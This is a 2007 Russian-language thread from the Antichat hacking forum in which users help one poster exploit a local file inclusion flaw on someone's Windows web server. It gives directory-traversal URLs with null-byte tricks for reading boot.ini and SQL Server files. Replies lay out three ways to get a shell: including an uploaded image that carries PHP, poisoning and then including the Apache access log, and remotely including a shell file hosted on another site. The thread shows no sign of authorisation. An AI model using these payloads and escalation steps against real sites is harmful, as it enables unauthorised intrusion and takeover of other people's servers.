Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)
-   -   инклюд на windows тачке (https://forum.antichat.xyz/showthread.php?t=49113)

Светлый 15.09.2007 16:57
инклюд на windows тачке
 
НАйден инклюд типа www.site.com/index.php?item=../../../../../../../../../boot.ini%00
какова дальнейшая последовательность действий? пытался передать параметры для cmd.exe, не выходит. Все конфиги в .php файлах, то есть инклудятся без отображения. Пытался вытащить mdf файлы по известным названиям баз данных, но тоже облом - пути вроде подобрал (/index.php?item=../../../../../../../../program%20files/microsoft%20sql%20server/mssql.1/mssql/binn/sqlctr.ini%00 выводится), а вот мдфники не выдираются..
Вобщем хелп, что тут можно попытатся сделать?

Spyder 15.09.2007 17:23
мб на сайте есть форум? ну или какой нибудь скрипт заливки картинок. Заливаешь картинку с пшп кодом внутри и инклудишь её

Светлый 15.09.2007 17:46
Да в том то и дело, что все форумы и галереи лежат на основном хосте, а этот дополнительный чисто под регистрации онлайн игрушки. Заливок никаких как и удалённого инклюда.

The_HuliGun 15.09.2007 20:58
Ищи лог апача.
Код:
Program Files\Apache Group\Apache\logs\access_log
Пробуй передать php код через http запрос. Он попадет в логи и проинклудив лог получишь шелл.

ant0ha 15.09.2007 21:17
приинклудь шел и всех делов то
Код:
www.site.com/index.php?item=http://www.site.ru/shell.txt

Spyder 15.09.2007 21:22
Цитата:
Сообщение от ant0ha
приинклудь шел и всех делов то
ты наркоман?
Цитата:
Сообщение от Светлый
Заливок никаких как и удалённого инклюда

Светлый 16.09.2007 03:54
Цитата:
Сообщение от The_HuliGun
Ищи лог апача.
Код:
Program Files\Apache Group\Apache\logs\access_log
Пробуй передать php код через http запрос. Он попадет в логи и проинклудив лог получишь шелл.
Мм.. спасибо за дельный совет, завтра попробую. Сервак просто в дауне.


Время: 22:28